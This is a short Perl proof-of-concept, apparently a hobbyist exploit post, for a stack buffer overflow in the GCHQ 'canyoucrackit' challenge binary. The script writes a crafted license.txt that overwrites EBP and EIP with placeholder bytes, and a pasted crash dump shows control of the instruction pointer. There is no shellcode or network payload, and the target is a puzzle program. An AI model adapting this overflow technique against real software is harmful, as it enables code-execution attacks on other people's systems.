1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
###
# GCHQ canyoucrackit challenge and vulnerable binary for the win!
# save and run perl poc.pl in the same directory as the GCHQ 
# canyoucrackit executable which can be obtained by visiting 
# the super secret url below.
# 
# URL: http://canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe
# the binary will create a stackdump when it crashes. 
# you will need cygwin1.dll and cygcrypt-0.dll to run the binary.
#
# Anyone else catch this? :)))
# 
# PoC just for fun 
# Dillon Beresford
# twitter.com/D1N
###

###
# Exception: STATUS_ACCESS_VIOLATION at eip=44444444
# eax=FFFFFFFF ebx=0022CD50 ecx=611663A0 edx=00000000 esi=0022CD75 edi=00000000
# ebp=42424242 esp=0022CD30 program=C:\Documents and Settings\tester\Desktop\gchq_owned_eip_42424242\da75370fe15c4148bd4ceec861fbdaa5.exe, pid 3364, thread main
# cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
###

my $exploit = "license.txt";

my $junk = "\x41" x 56;
my $ebp = "\x42" x 4;

my $eip = "\x44\x44\x44\x44";

my $payload = $junk.$ebp.$eip;
 
open (myfile,">$exploit");
print myfile $payload;
close (myfile);